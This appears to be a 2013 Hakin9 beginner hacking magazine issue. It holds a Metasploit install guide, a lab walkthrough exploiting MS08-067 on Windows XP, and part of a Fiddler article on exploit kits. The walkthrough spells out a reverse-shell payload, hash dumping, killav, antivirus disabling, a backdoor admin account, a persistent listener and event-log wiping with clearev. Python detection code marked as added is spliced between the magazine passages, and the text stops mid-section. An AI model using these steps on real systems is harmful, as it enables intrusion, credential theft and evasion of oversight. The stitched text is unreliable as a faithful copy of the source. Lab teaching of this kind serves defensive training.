(01_2013) - beginners guide to hacking



01/2013 4

Team

Editor in Chief: Krzysztof [email protected]

Editorial Advisory Board: John Webb, Marco Hermans, Gareth Watters, Peter Harmsen, Dhawal Desai

Proofreaders: Jeff Smith, Krzysztof Samborski

Special thanks to our Beta testers and Proofreaders who helped us with this issue. Our magazine would not exist without your assistance and expertise.

Senior Consultant/Publisher: Paweł Marciniak

CEO: Ewa Dudzic [email protected]

Product Manager: Krzysztof [email protected]

Production Director: Andrzej Kuca [email protected]

DTP: Ireneusz Pogroszewski

Art Director: Ireneusz Pogroszewski [email protected]

Publisher: Hakin9 Media Sp. z o.o. Spółka Komandytowa, 02-676 Warszawa, ul. Postępu 17d, NIP: 9512353396, Regon: 145995275, Phone: 1 917 338 3631, www.hakin9.org/en

Whilst every effort has been made to ensure the highest quality of the magazine, the editors make no warranty, expressed or implied, concerning the results of the contents' usage. All trademarks presented in the magazine were used for informative purposes only.

All rights to trade marks presented in the magazine are reserved by the companies which own them.

DISCLAIMER! The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

Dear Readers,

I am happy to present you with this very first issue of our new project, Hakin9 Starter Kit. This issue will address various topics connected with IT Security. Although the line is mainly devoted to those of you who would like to start their journey with hacking, we strongly believe that each and every reader of ours will find something interesting here. For them, the issue can be regarded as a perfect repetition of the knowledge you already have.

Despite the fact that this issue addresses various topics, the following ones will stress particular topics like tools, methods, technologies or devices. With this first issue we wanted to shed some light on the structure and content of the whole project.

This time you will find sections such as: Exploiting Software, Forensics, Hacking, Cloud and Security.

In case you are interested in writing a basic article for our forthcoming editions, please feel free to contact us at [email protected].

We are really interested in your opinions on our new line too. Please send them to the aforementioned mailing address.

Hope you enjoy the magazine!

Regards,
Krzysztof Samborski
Hakin9 Product Manager and Hakin9 Team

CONTENTS

EXPLOITING SOFTWARE

A Quick Reference To Metasploit Framework (page 06)
By Abhinav Singh, the author of Metasploit Penetration Testing Cookbook, a contributor to the SecurityXploded community

My First Hack, Basic Introduction To Metasploit Framework (page 10)
By Guglielmo Scaiola, I.T. Pro since 1987, MCT, MCSA, MCSE, Security+, Lead Auditor ISO 27001, ITIL, eCPPT, CEI, CHFI, CEH and ECSA

How To Capture Web Exploits With Fiddler (page 18)
By Jerome Segura, a Senior Malware Researcher at Malwarebytes

How To Reverse Engineer .NET Files (page 24)
By Jaromir Horejsi, a computer virus researcher and analyst

FORENSICS

An Introduction To Microsoft Windows Forensics (page 28)
By Akshay Bharganwwar, a representative of Indian Cyber Army, Hans-Anti Hacking Society & International Cyber Threat Task Force

Digital Forensics On The Apple OSX Platform (page 32)
By David Lister, CISSP, CASP, CCISO, CCNA, CEH, ECSA, CPT, RHCSA, Security+

HACKING

A Beginners Guide To Ethical Hacking (page 38)
By Deepanshu Khanna, Linux Security Researcher and Penetration Tester at Prediqnous Cyber Security & IT Intelligence

Hack Again, From Servers To Clients (page 46)
By Guglielmo Scaiola, I.T. Pro since 1987, MCT, MCSA, MCSE, Security+, Lead Auditor ISO 27001, ITIL, eCPPT, CEI, CHFI, CEH and ECSA

How To Perform SQL Injection And Bypass Login Forms Like A Pro (page 52)
By James Tan, ISO 27001, CISSP, CCSK, CISA, eCPPT, PMP

How To Become A Penetration Tester (page 60)
By Preston Thornburg, a Senior Penetration Tester who has worked for Rapid7, Knowledge Consulting Group, International Business Machines, Mantech International, and Sun Microsystems

Passwords Cracking: Theory And Practice (page 66)
By Theodosis Mourouzis, a PhD student at University College London, and Marios Andreou, MSc in Information Security from Royal Holloway (the University of London's Information Security Group)

Fedora Security Spin: An All-in-one Security Toolbox (page 72)
By Abdy Martínez, Telecommunications Administrator at AES Panama, specialized in Network / Information Security and Forensics

CLOUD

Intrusion Detection System (IDS): An Approach To Protecting Cloud Services (page 76)
By Fahad F. Alruwaili, an Information Security Consultant, PhD Student, Research Assistant, and Full Time Lecturer at Shaqra University

Understanding Cloud Security Issues (page 80)
By Moshe Ferber, one of Israel's leading information security experts

SECURITY

How To Store Data Securely On The Android Platform (page 86)
By Stefano fi Franciska, Software analyst/developer

How To Secure Web Applications (page 92)
By Vahid Shokouhi, an Information Security Consultant experienced in Service Provider environments

CouchDB Database For Web And Mobile Platforms (page 100)
By Zana Ilhan, a Senior Software Architect and Cloud Team Leader at a hi-tech R&D company

How To Get Maximum Security Of Your Information (page 106)
By Ahmed Fawzy, CEH-ECSA-ITIL-MCP-MCPD-MCSD-MCTS-MCT

A Quick Reference To Metasploit Framework

Metasploit is currently the most widely used and recommended penetration testing framework. What makes Metasploit so popular is the wide range of tasks it can perform to ease the work of penetration testing. Let us start with a quick introduction to the framework and the various terms related to it.

Metasploit framework: a free, open source penetration testing framework started by H.D. Moore in 2003 and later acquired by Rapid7. The current stable versions of the framework are written in Ruby. It has the world's largest database of tested exploits and receives more than a million downloads every year. It is also one of the most complex projects built in Ruby to date.

Vulnerability: a weakness which allows an attacker/pen-tester to break into or compromise a system's security. The weakness can exist in the operating system, in application software or even in the network protocols.

Exploit: code which allows an attacker/tester to take advantage of the vulnerable system and compromise its security. Every vulnerability has its own corresponding exploit. Metasploit v4 has more than 700 exploits.

Payload: the actual code which does the work. It runs on the system after exploitation. Payloads are mostly used to set up a connection between the attacking and the victim machine. Metasploit v4 has more than 250 payloads.

Module: modules are the small building blocks of a complete system. Every module performs a specific task and a complete system is built by combining several modules to function as a single unit. The biggest advantage of such an architecture is that it becomes easy for developers to integrate new exploit code and tools into the framework.

The Metasploit framework has a modular architecture and all the exploits, payloads, encoders etc. are treated as separate modules (Figure 1).

Let us examine the architecture diagram closely. Metasploit uses different libraries which hold the key to the proper functioning of the framework. These libraries are a collection of pre-defined tasks, operations and functions that can be used by the different modules of the framework. The most fundamental part of the framework is the Rex library, short for Ruby Extension Library. Some of the components provided by Rex include a wrapper socket subsystem, implementations of protocol clients and servers, a logging subsystem, exploitation utility classes, and a number of other useful classes. Rex itself is designed to have no dependencies other than what comes with the default Ruby install.

Then we have the MSF Core library, which extends Rex. Core is responsible for implementing all of the required interfaces that allow interaction with exploit modules, sessions and plugins. This core library is extended by the framework base library, which is designed to provide simpler wrapper routines for dealing with the framework core as well as utility classes for dealing with different aspects of the framework, such as serializing module state to different output formats. Finally, the base library is extended by the framework UI (user interface), which implements support for the different types of user interfaces to the framework itself, such as the command console and the web interface.

There are four different user interfaces provided with the framework, namely msfconsole, msfcli, msfgui and msfweb. It is highly encouraged that you check out all of these different interfaces.

Configuring Metasploit on Windows

Installation of the Metasploit framework on Windows is simple and requires almost no effort. The framework installer can be downloaded from the official Metasploit website, http://www.metasploit.com/download.

You will notice that there are two types of installer available for Windows. We recommend downloading the complete installer of the Metasploit framework, which contains the console and all other relevant dependencies along with the database and runtime setup. In case you already have a configured database that you want to use for the framework as well, you can go for the mini installer, which only installs the console and its dependencies.

You will find that the installer has created lots of shortcuts for you. Most things are click-and-go in a Windows environment. Some of the options that you will find are Metasploit web, the cmd console, Metasploit update etc.

Configuring Metasploit on Ubuntu

The Metasploit framework has full support for Ubuntu-based Linux operating systems. The installation process is a bit different from that of Windows, and the process for installing a full setup is a bit different from the minimal setup. Let us analyse each of them.

Full installer: execute the following commands to install the framework on your Ubuntu machine:

$ chmod +x framework-4.*-linux-full.run
$ sudo ./framework-4.*-linux-full.run

Minimal installer: execute the following commands to install the framework with minimal options:

$ chmod +x framework-4.*-linux-mini.run
$ sudo ./framework-4.*-linux-mini.run

The installation process demonstrated above is the simple Ubuntu installation procedure used for almost all software. Once the installation is complete, you can run hash -r to reload your path.

Now let's talk about some other options, or possibly some pieces of general information that are relevant to this task. There is a chance that the installer may not work for you for some reason. Some versions of Ubuntu come with broken Ruby libraries, which may be one of the reasons for the installation failure. In that case, we can install the dependencies separately by executing the following commands.

Installing Ruby dependencies:

$ sudo apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems

    Installing the subversion client:

    $ sudo apt-get install subversion

    Building Native Extensions:

    $ sudo apt-get install build-essential ruby-dev libpcap-dev

After installing these dependencies, download the Metasploit Unix tarball from the official Metasploit download page and execute the following commands:

$ tar xf framework-4.X.tar.gz
$ sudo mkdir -p /opt/metasploit4
$ sudo cp -a msf4/ /opt/metasploit4/msf4
$ sudo chown root:root -R /opt/metasploit4/msf4
$ sudo ln -sf /opt/metasploit4/msf4/msf* /usr/local/bin/

    On successful execution of the above commands, the framework will be up and running to receive your instructions.

This was a quick tutorial on getting started with the Metasploit framework and how it can be set up to work in different environments. It is highly recommended that the reader install the complete framework and get hands-on experience working with it. Do not forget that the Metasploit framework is an open source platform, so you always have the power to customize it according to your needs.

Abhinav Singh

Abhinav Singh is a young information security specialist from India. He has a keen interest in the field of hacking and network security and has adopted this field as his full-time employment. He is the author of Metasploit Penetration Testing Cookbook, a book dealing with Metasploit and penetration testing. He is also a contributor to the SecurityXploded community. Abhinav's work has been quoted in several portals and technology magazines. He can be reached at: Mail: [email protected]. Twitter: @abhinavbom.

Figure 1. Metasploit Architecture


My First Hack, Basic Introduction to Metasploit Framework

Hey guys, are you ready for 0wning our first machine? Yes, today we go together into the world of ethical hacking. We try to exploit our first machine, but not like script kiddies: with the five steps of a professional pentest. Yes, the machine has an old operating system on board, and yes, the exploit is also old, but I hope you understand all our steps and, with patience and study, you can exploit newer machines in the same manner.

For this lab I use an old Windows XP SP3 (Italian) and my favourite attacking machine with BackTrack 5 R3 x64. The IP address of the target is 192.168.254.11/24 and my IP is 192.168.254.3/24.

This article is for beginners, so a word on setting the attacker IP address. BT5 R3 has a DHCP client daemon, dhclient3, started by default, but I can set my IP statically with three simple commands:

ifconfig eth0 192.168.254.3/24 (sets the IP address and subnet)

route add default gw 192.168.254.254 (sets the default gateway)

echo nameserver 8.8.8.8 > /etc/resolv.conf (sets the DNS server; here I use Google's DNS server)

You can stop the DHCP client service with killall dhclient3. Without this command you can lose your IP when the dhclient timeout ends and the daemon starts a new DHCPDISCOVER.

If you prefer DHCP, you can force the process with the command dhclient3 (Figure 2).

For a more realistic environment I have installed Avast Free Antivirus 2012 on the target machine, with the latest signature database (Figure 3).

Figure 1. Static IP

Figure 2. Start DHCP client

Figure 3. My target machine AV

Normally I use VMware Workstation for my labs; today I am using version 9.0.1. The network setup does not matter: now I work in bridged mode, but you can use your preferred configuration. The only requirement is to set up all virtual machines in the same manner.

Now I will work in a professional way, like an ethical hacker and not a black hat. To do this I need to respect the ROE (rules of engagement) to ensure the SLA (service level agreement), but this is not enough: to ensure metrics and repeatability we need to use a well-known methodology. It is out of the scope of this article to explain in detail a complex methodology like OSSTMM, but the simplest methodology is the use of five steps: two steps of the pre-attack phase, the attack phase, and two steps of the post-attack phase.

Here we go with the first step, scanning.

Step 1 Scanning

For this purpose I use nmap. In my opinion nmap is the best choice for network scanning. You can scan the network in many ways, but if your ROE includes low noise you can't use the scanner with all default settings, like:

nmap 192.168.254.11 (just for timing, I work with the single IP and not with the entire subnet)

If I use all nmap defaults I will scan 1000 ports (http://nmap.org/book/man-port-specification.html) with T3 timing; with T3 nmap includes parallelization of scanned ports (T0 waits 5 min. between sending each probe, T1 waits 15 sec. and T2 waits 0.4 sec., see http://nmap.org/book/man-performance.html). For a stealthier scan I choose only a few ports, in my example the ports 80, 139, 445, 21 and 3389, and I set the timing manually. In real life I would choose T0, but in this example, and only to avoid wasting time, I use T3. With the switch -sV I tell nmap to scan service versions.

nmap 192.168.254.11 -p 80,139,445,21,3389 -sV -O -T3

The first interesting information is that ports 139 and 445 are open, and nmap also tries to discover the operating system version:

OS CPE: cpe:/o:microsoft:windows_xp::sp3

OS details: Microsoft Windows XP SP3

Mmmmh, if you are an experienced pentester the couple of Windows XP and port 139 (or 445) TCP open suggests an SMB vulnerability... OK, let's go deeper using nmap scripts.

Step 2 Enumeration

We have a lot of tools and techniques for enumeration. If you are very aggressive, you can use Nessus, OpenVAS or other vulnerability assessment tools; for this demo I will use some NSE scripts. NSE is the Nmap Scripting Engine, and this kind of script can help you in a lot of situations. If you want to know more about NSE scripts you can read the documentation at http://nmap.org/nsedoc/. In our example I use only two scripts; this is a good technique for keeping the noise down. If you don't have this problem you can use all scripts, a script family, or just some scripts. The default family is run with nmap's -A switch, which executes -sV (version scan), -O (operating system detection), traceroute and the default family of NSE scripts; the scripts that make up the various families can be found on the nsedoc web page. For scanning my target I use the smb-check-vulns script to check if the target is vulnerable to some well-known attacks; the second script is smb-os-discovery, which is good for detecting the OS version via SMB discovery. The first script can be dangerous, so nmap does not run it directly: for the right execution you must use the switch --script-args=unsafe=1 (Figure 5 and Figure 6).

Figure 4. Scanning with nmap

Figure 5. smb-check-vulns script

Figure 6. smb-os-discovery script

Figure 7. Run nmap scripts

My command becomes:

nmap 192.168.254.11 -p 139 --script=smb-os-discovery,smb-check-vulns --script-args=unsafe=1

After the scripts execute I can see that the target machine is vulnerable to the MS08-067 SMB remote buffer overflow. Now I try to gain access to the target machine.
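From the defender's side, the scan in Steps 1 and 2 is built to stay quiet: a handful of ports, spaced out by the timing template. The following Python is an added example (not from the article) that runs two detectors over a constructed flow log and shows that a rate-based threshold misses a -T0 style scan while a distinct-port count over a long window does not; the log format, port weighting and thresholds are assumptions made for this example.

```python
"""Added example: detecting the low-noise targeted scan from Steps 1 and 2.

nmap -T0 waits about five minutes between probes, so a detector that
counts probes per minute never fires. Counting distinct destination ports
per (src, dst) pair over a long window, and giving extra weight to the
FTP/HTTP/SMB/RDP ports the article targets, fires regardless of timing.
Log format and thresholds are assumptions made for this example.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Ports probed explicitly in the walkthrough; two or more of these from one
# source to one host is suspicious even at a very low rate.
WATCHED_PORTS = {21, 80, 139, 445, 3389}

# Constructed flow log: "<ISO timestamp> <src> <dst> <dport> <tcp flags>".
# The first source probes the five article ports five minutes apart (-T0
# style); the second is an ordinary client talking to port 80 only.
SAMPLE_LOG = """\
2013-01-15T10:00:00 192.168.254.3 192.168.254.11 21 S
2013-01-15T10:01:00 192.168.254.20 192.168.254.11 80 S
2013-01-15T10:02:00 192.168.254.20 192.168.254.11 80 S
2013-01-15T10:05:00 192.168.254.3 192.168.254.11 80 S
2013-01-15T10:10:00 192.168.254.3 192.168.254.11 139 S
2013-01-15T10:15:00 192.168.254.3 192.168.254.11 445 S
2013-01-15T10:20:00 192.168.254.3 192.168.254.11 3389 S
"""


def parse_log(log):
    """Group SYN probes by (src, dst) as sorted (timestamp, dport) lists."""
    probes = defaultdict(list)
    for line in log.strip().splitlines():
        ts, src, dst, dport, flags = line.split()
        if "S" in flags:  # only connection attempts, not established traffic
            probes[(src, dst)].append((datetime.fromisoformat(ts), int(dport)))
    for key in probes:
        probes[key].sort()
    return probes


def ports_in_window(probes, start, window):
    """Distinct ports probed in [start, start + window]."""
    return {p for t, p in probes if start <= t <= start + window}


def rate_based_alerts(log, window=timedelta(minutes=1), min_ports=3):
    """Naive detector: many distinct ports within a short window."""
    alerts = set()
    for key, probes in parse_log(log).items():
        for t0, _ in probes:
            if len(ports_in_window(probes, t0, window)) >= min_ports:
                alerts.add(key)
                break
    return alerts


def count_based_alerts(log, window=timedelta(hours=1), min_ports=3, min_watched=2):
    """Long window: alert on distinct-port count, or on a couple of watched ports."""
    alerts = {}
    for key, probes in parse_log(log).items():
        for t0, _ in probes:
            ports = ports_in_window(probes, t0, window)
            if len(ports) >= min_ports or len(ports & WATCHED_PORTS) >= min_watched:
                alerts[key] = sorted(ports)
                break
    return alerts


if __name__ == "__main__":
    print("rate-based :", rate_based_alerts(SAMPLE_LOG))   # empty: the slow scan is missed
    print("count-based:", count_based_alerts(SAMPLE_LOG))  # flags 192.168.254.3 -> .11
```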

Step 3 Gaining access

If you are a n00b it is possible that you don't know what MS08-067 is. This is a GREAT exploit, just a little bit old, but great: you can use this exploit a lot of times, even against a machine already compromised; if the exploit crashes, no problem, you can reuse it again. The next SMB exploit, MS09-050, is also a good exploit, but sometimes you can get a BSOD; if your session crashes you aren't able to compromise the target again unless the machine is rebooted. No, MS08-067 is not like this: you can use it as many times as you want, in any way you want... of course, if the service is started :D.

But if you don't know this exploit, Google is your friend. If I put my question into Google, "metasploit ms08 067 netapi", I get the page on the metasploit.com site (Figures 8-10).

As you can see, this exploit works with a lot of operating systems, from Windows 2000 universal to Windows XP SP3; the exploit also has the default option automatic targeting... great.

Now I can start Metasploit on my attacking machine. In my installation Metasploit is in /git/metasploit/metasploit-framework; if your path is different you need to modify the change directory operation. On my machine:

Figure 8. Search exploit with Google: http://www.metasploit.com/modules/exploit/windows/smb/ms08_067_netapi

Figure 9. Exploit description on metasploit.com

Figure 10. Target OS for my exploit

cd /git/metasploit/metasploit-framework

It is also possible that your Metasploit path is in the executable search path; in that case you need only to call the Metasploit console.

OK, now I am in the correct directory and I can start msfconsole, my preferred Metasploit interface:

./msfconsole (if you are invoking the Metasploit console from another directory because the binary is in the executable search path, you must type only msfconsole without the ./; Figure 11).

Now, if I don't know where the exploit is, I can search with the command:

search ms08-067

I type use exploit/windows/smb/ms08_067_netapi to set my exploit, and with the command info I get, more or less, the same output as the web page of Figures 13 and 14.

I need to set my payload and other required options. If I can, I use meterpreter, and the reverse payloads are very useful; you can also choose a payload like reverse_http that complies with protocol requirements, see https://community.rapid7.com/community/metasploit/blog/2011/06/29/meterpreter-httphttps-communication:

Figure 11. Starting msfconsole

Figure 12. Searching exploit in Metasploit

Figure 13. Exploit info

Figure 14. Exploit info cont.

Figure 15. Setting exploit

Figure 16. Gotcha

set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST 192.168.254.11
set LHOST 192.168.254.3

RHOST is the target machine; LHOST is the machine where I want the reverse shell to go.

With show options I can verify my settings and with exploit I can run my exploit.

In the real world I use exploit -j because with this option you can force the active module into the background (Figures 15 and 16).

In Figure 16 you can see the creation of your first meterpreter session... very well, you are a hacker now...

...mmmmhh, it is not so simple, you still have a long way to go, but this is your first 0wning, this is the beginning. Now you can interact with your session using the command:

sessions -i 1

With getuid you can show your current user and with getpid you can see your process id; the command ps shows the processes. At this point you can migrate from your current process to another; in this case I want to migrate to the explorer process. This is a good process: normally users don't kill explorer until the machine is turned off.

Figure 17. Start interaction

Figure 18. Target processes

Figure 19. Migrate to another process

Figure 20. Password hashes

Figure 21. Oops

Figure 22. Avast wins

Figure 23. OK, try again

Figure 24. Uninstall metsvc

For migrating from one process to another I use the migrate command with the PID number (Figure 18).

In my example explorer has PID 1084 and I type:

migrate 1084

If I need system privileges I can try privilege escalation with the getsystem command.

Step 4 Maintaining access

For future use I can get the password hashes with the hashdump script:

run hashdump

The AV installed on my target machine doesn't show alerts because meterpreter works only in memory, but the problem of staying in memory is: if the user reboots the machine I lose my session, and if the user loads the Microsoft patch for this vulnerability I lose my session forever. Meterpreter has two ways to maintain access, but to do this it is necessary to put something on the hard disk, and now the AV wins... try:

run metsvc (metsvc has some options, but in this case they are not important).

Figure 25. Avast processes

Figure 26. Trying another way

Figure 27. Avast 2, Persistence 0

Figure 28. Go to RDP

Figure 29. Connecting with rdesktop

Figure 30. Log me in

Figure 31. Disabling AV

Figure 32. Meterpreter service

    As you can see in Figure 21 meterpreter cant cre-ate the service and if you go to target console you can see the AV popupnot good (Figure 22).

    Is not my business, but a lot of time ago my friend tell me the existence of killav scriptI dont know but the name look goodlets try run killav and now try again with metsvc (Figure 23)

    Fail again if you type run metsvc with h you get the help and with run metsvc r you can uninstall the service with the AV is possible which a part of service get installed, is better to remove before continue with our experiments (Figure 24)

    With the ps command you can show the AV processes; in my case the AV is Avast and the processes are AvastSvc and AvastUi, but you can't stop these processes. Today most AVs protect their services from being stopped, and in a lot of products you can't modify the registry keys of these services (Figure 25). OK, bypassing AV is too hard for me; I will try the second way (Figure 26):

    run persistence

    But the AV wins again, no way (Figure 27). OK, forget persistence for a few moments.

    Now I want to get RDP access; to do this I need to create a new admin user:

    load incognito (with this extension I work with users and groups)

    add_user hacker Passw0rd (I add a new user hacker with password Passw0rd)

    add_localgroup_user administrators hacker (I put my newly created user in the administrators group)

    Figure 33. Listening ports

    Figure 34. Deleting user

    Figure 37. The target log verbosely

    Figure 36. Uninstalling metsvc

    Figure 35. Disabling RDP



    Now I will enable RDP on the target machine; I have a useful script for this (Figure 28):

    run getgui -e

    I log on to my target with rdesktop:

    rdesktop 192.168.254.11 -k it (I use an Italian keyboard)

    And now I am logged on (Figure 30). Now I will disable the AV; I will try the most trivial solution, from the Windows XP GUI: right-click the AV icon and then disable it for a few minutes (Figure 31);

    Figure 38. But now dont log me

    Figure 39. The log look better now

    Figure 40. Yes, now look good

    if you retry now with run metsvc the service will install, and the default metsvc port 31337 TCP is listening (Figure 32 and Figure 33).

    If you scan the HD with your AV the meterpreter file will be discovered, and the name of the service is too detectable, but this is a beginner's article. Stay tuned ;)

    Step 5 Clearing tracks

    My first step in clearing tracks is to remove everything I installed for disabling the AV: from the GUI I open compmgmt.msc and delete my user hacker (Figure 34).

    After that I open Remote connection and remove the flag that enables RDP (Figure 35).

    Now I lose the connection to the system; from my meterpreter console I remove the metsvc service with run metsvc -r (Figure 36).

    Before closing my session one thing is still missing: the log. Just for your information, this is the log of my target machine (Figure 37).

    Mmmhhh, too much information. From the meterpreter session I type clearev and all the logs will be cleared (Figure 38).

    If you look at the log now you can see only Security Event ID 517, the audit log was cleared, by NT AUTHORITY\SYSTEM (Figure 39), and the other logs contain nothing. Now you can go and drink a nice cold beer, young hacker, but this is only the beginning... the next step is to try to get a session via a client-side attack (Figure 40)
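    From the defender's side, the steps above leave records that survive only if the Security log is forwarded off the host before clearev runs. As an added example (not part of the article), the Python below triages constructed Security-log events and netstat lines for exactly those traces: the new local admin, the RDP logon, the metsvc listener on 31337 and the audit-log-cleared event (517 on XP/2003, 1102 on Vista and later); the Vista+ event IDs, the sample records and the 192.0.2.10 address are assumptions added here.

```python
"""Defender-side triage of the traces the walk-through above leaves behind.

Added example, not part of the article. The Security-log events and netstat
lines below are constructed; the event IDs are the XP/2003 ones the article
shows (517 = audit log cleared) plus their Vista-and-later equivalents.
"""
AUDIT_LOG_CLEARED = {517, 1102}          # 517 on XP/2003, 1102 on Vista and later
USER_CREATED = {624, 4720}
LOCAL_GROUP_MEMBER_ADDED = {636, 4732}
LOGON = {528, 4624}
RDP_LOGON_TYPE = "10"                    # Logon Type 10 = RemoteInteractive (RDP)
METSVC_DEFAULT_PORT = 31337              # listener opened by "run metsvc" in the text

# Constructed events, in the order the steps above would produce them. Only the
# last one survives clearev on the host itself; the others exist only if the log
# was forwarded to a collector before it was cleared.
SAMPLE_EVENTS = [
    {"id": 624, "target": "hacker", "subject": "NT AUTHORITY\\SYSTEM"},
    {"id": 636, "group": "Administrators", "member": "hacker"},
    {"id": 528, "target": "hacker", "logon_type": "10", "source_ip": "192.0.2.10"},
    {"id": 528, "target": "alice", "logon_type": "2", "source_ip": "-"},  # benign console logon
    {"id": 517, "subject": "NT AUTHORITY\\SYSTEM"},
]

# Constructed "netstat -an" output from the target after "run metsvc" and "run getgui -e".
SAMPLE_NETSTAT = """\
Proto  Local Address          Foreign Address        State
TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
TCP    0.0.0.0:31337          0.0.0.0:0              LISTENING
TCP    192.168.254.11:3389    192.0.2.10:50012       ESTABLISHED
"""


def triage_events(events):
    """Return one finding per event matching a step of the walk-through, in log order."""
    findings = []
    for ev in events:
        eid = ev["id"]
        if eid in AUDIT_LOG_CLEARED:
            findings.append(f"event {eid}: audit log cleared by {ev.get('subject', '?')}")
        elif eid in USER_CREATED:
            findings.append(f"event {eid}: local user created: {ev.get('target', '?')}")
        elif eid in LOCAL_GROUP_MEMBER_ADDED and ev.get("group", "").lower() == "administrators":
            findings.append(f"event {eid}: {ev.get('member', '?')} added to Administrators")
        elif eid in LOGON and ev.get("logon_type") == RDP_LOGON_TYPE:
            findings.append(f"event {eid}: RDP logon as {ev.get('target', '?')} "
                            f"from {ev.get('source_ip', '?')}")
    return findings


def suspicious_listeners(netstat_output, watch_ports=(METSVC_DEFAULT_PORT,)):
    """Parse 'netstat -an' style lines; return the watched ports found in LISTENING state."""
    hits = []
    for line in netstat_output.splitlines():
        parts = line.split()
        if len(parts) >= 4 and parts[0].upper() == "TCP" and parts[3].upper() == "LISTENING":
            port = int(parts[1].rsplit(":", 1)[1])       # also handles [::]:port
            if port in watch_ports:
                hits.append(port)
    return hits


if __name__ == "__main__":
    for finding in triage_events(SAMPLE_EVENTS):
        print(finding)
    for port in suspicious_listeners(SAMPLE_NETSTAT):
        print(f"unexpected listener on TCP {port} (metsvc default)")
```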

    Guglielmo Scaiola
    I have worked as an IT Pro since 1987; I am a freelance consultant, pentester and trainer, and I work especially in banking environments. Over the years I have achieved several certifications, including: MCT, MCSA, MCSE, Security+, Lead Auditor ISO 27001, ITIL, eCPPT, CEI, CHFI, CEH and ECSA. In 2011 I was awarded the EC-Council Instructor Circle of Excellence. I can be contacted at [email protected].


    Fiddler acts as a proxy between client applications (such as a web browser) and the websites they are connecting to (Figure 1). All HTTP(S) requests and responses transit through the proxy, giving you the ability to see exactly what is going on between your browser and the servers it is connecting to.

    Analyzing web traffic

    Every time you navigate to a website, your browser sends out a Request for a particular URL. The web server replies with a Response containing the page you asked for (or a 404 Not Found error if that document does not exist). This Request-Response workflow is known as a Web Session in Fiddler. Each Session is represented by a row in the Web Sessions List: Figure 2.

    Fiddler uses standard columns (you can add more or customize your own) that display certain properties for each Web Session:

    #: A number that sorts each Session in chronological order.

    Result: The HTTP response code indicating whether the server was able to fulfill the request or not.

    Protocol: Fiddler only works for the HTTP(S) and FTP protocols.

    Host: The website's domain name.

    URL: The full path of the URL requested.

    Body: The size of the response.

    Caching: Caching, as supported by client applications.

    Content-Type: As described, the type of content returned (html, JavaScript, image...)

    How To Capture Web Exploits With Fiddler

    Drive-by attacks are the most common infection vector and have been so for several years. The Exploit Kit market is also thriving, and the kits are getting more sophisticated and pricier. Whether you suspect your own site has been infected or you are a security researcher tracking down malicious URLs, Fiddler is a very capable and useful tool to help you identify traffic patterns, malicious code and exploit URLs.

    Figure 1. Fiddler's proxy between client application and web server

    Figure 2. Fiddler's main view showing the Web Sessions list



    Process: The client application making the request (e.g. Internet Explorer, Firefox, Adobe Reader, etc.)

    Most people only use Fiddler to view web traffic or find which URLs are being requested, and its simple interface does the job quite well. But there's a whole new world beyond that if you are interested in learning more about the code that goes through your browser.

    By default, Fiddler's Tab section is on the right-hand side and gives you more information on each Web Session. We will focus on the Inspectors tab as it is the most relevant to our needs. When you highlight a particular Web Session, the Inspectors tab is divided into the Request at the top and the Response at the bottom.

    The Request view (Figure 3) gives you information about the client (through its User-Agent), its Request type (GET, POST, etc.) as well as other parameters such as compression (Encoding), cookies, etc. (Figure 4).

    The web server's Response (Figure 5) includes the type and length of the response's body as well as some information revealed by the server's configuration files (operating system, server software, etc.).

    You will note there are other sub-tabs for both the Request and Response. The Raw tab is your go-to shortcut to rapidly view the content's body. The information is rendered in plain text format.

    Based on the content type, the raw view may not be best suited. If you are dealing with an image you may want to check the ImageView tab; if you have an executable you may want to open the HexView tab. Since we often want to review the source code of a webpage, I recommend the SyntaxView, which nicely formats HTML, JavaScript or CSS code (Figure 6).

    To enable some of these views and more, you can check out Fiddler's extensions page.

    Spotting malicious code

    Now that you know the basic principles, let's dig in deeper and look at how Fiddler can help you identify malicious code. But first let's find out what you should expect to be looking for. A typical drive-by download attack has some aspects that may vary slightly from one attack to another, but generally speaking they still use a similar pattern.

    Figure 7. Source code view showing a malicious external link

    Figure 6. SyntaxView and its friendly formatting

    Figure 5. The Response's Raw window

    Figure 4. The Response Headers window

    Figure 3. The Request headers window

    Infected legitimate website URL

    In the majority of cases, it all stems from a typical website that has been infected with malicious code. The purpose of that code is to redirect the visitor to an external and malevolent website. The Response's body viewed using the SyntaxView shows such an example (I manually circled the malicious link in red): Figure 7.

    Redirects

    As a way to evade simple detection and be more dynamic, the bad guys will often redirect traffic several times before taking the victim to an exploit site (Figure 8 and Figure 9).

    Exploit Kit landing page URL

    This is where the exploits begin. In many cases, the victim's system (operating system, browser type and version, plugins etc.) will be identified prior to delivering the malicious code. To make detection harder, such code is usually well obfuscated.

    Not all obfuscated code is malicious (some websites want to protect their intellectual property and actually encrypt their code from prying eyes for good reasons) (Figure 10).

    Exploit Kit malicious files (JARs, PDFs, SWF, etc.)

    Besides exploiting the browser itself, most exploits target third-party browser plugins in software like Java or Adobe. As such, exploit kits will download infected documents which, as soon as they are opened, exploit one of many vulnerabilities and allow for undesired code execution.

    The image below shows a Java, PDF and Flash exploit (Figure 11).

    The Flash exploit isn't obvious until you take a look at the Request headers, which tell you what version of Flash is installed and is going to be exploited (Figure 12).

    Figure 12. The browser telling the server which version of Flash is installed

    Figure 10. A landing page with obfuscated code

    Figure 9. Multiple domains being used before reaching an exploit landing page

    Figure 8. A typical http-equiv=refresh that redirects the user

    Figure 11. An Exploit Kit's URLs pointing at infected documents

    Figure 13. The MZ Magic Number representing an executable



    Exploit Kit malware payload

    The main reason all these efforts have been put into place is for a malicious binary to be downloaded and infect the victim's PC. The HexView tab will show you the file in hexadecimal: Figure 13.

    Archiving files for later or to exchange with others

    Another feature that few people know is that Fiddler stores all of the files in its Web Sessions list. In other words, you can save them to disk directly from Fiddler: select a session, right-click and choose Save>Response>Response Body (Figure 14).

    As with other tools, your traffic capture can be exported to various formats: Figure 15.

    It is also possible to save your entire capture as a SAZ (Session Archive Zip) file, Fiddler's native file type, so you can re-open it later in Fiddler. Password-protect SAZ files with AES encryption to store sensitive traffic captures that might have embedded malicious code (Figure 16).

    Automating malicious code detection on the fly

